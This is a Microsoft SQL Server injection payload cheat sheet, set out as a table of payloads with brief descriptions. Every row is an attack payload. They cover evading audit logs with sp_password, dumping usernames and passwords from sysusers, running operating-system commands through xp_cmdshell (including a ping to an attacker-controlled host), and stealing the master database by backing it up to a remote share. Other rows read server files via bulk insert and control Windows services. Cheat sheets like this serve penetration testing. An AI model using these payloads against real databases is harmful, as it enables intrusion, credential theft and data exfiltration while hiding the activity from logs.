Microsoft SQL
| Payload | Description (if any) |
| --- | --- |
| 'admin --sp_password | sp_traceXXX audit evasion. The sp_password prevents storing clear text passwords in the log files. Appending it after the comment marker (--) can prevent SQL Injection queries from being logged. |
| select @@version | View database version. |
| select @@servername | Misc. information disclosure |
| select @@microsoftversion | Misc. information disclosure |
| select * from master..sysservers | Misc. information disclosure |
| select * from sysusers | View database usernames and passwords. |
| exec master..xp_cmdshell 'ipconfig+/all' | Misc. command execution with xp_cmdshell. |
| exec master..xp_cmdshell 'net+view' | Misc. command execution with xp_cmdshell. |
| exec master..xp_cmdshell 'net+users' | Misc. command execution with xp_cmdshell. |
| exec master..xp_cmdshell 'ping+system-controlled-by-attacker' | Misc. command execution with xp_cmdshell. This is useful for blind SQL Injection tests (where no results are displayed). |
| BACKUP database master to disk='\\{IP}\{sharename}\backupdb.dat' | Back up the entire database to a file. This attack can be used to steal a database. |
| create table myfile (line varchar(8000)); bulk insert myfile from 'c:\inetpub\wwwroot\auth.asp'; select * from myfile-- | Reading files on the filesystem. |
| xp_servicecontrol (START or STOP) <service> | Start and stop Windows Services. |
| str1 + str2 OR n+n | Concatenate strings for blind SQL Injection tests. |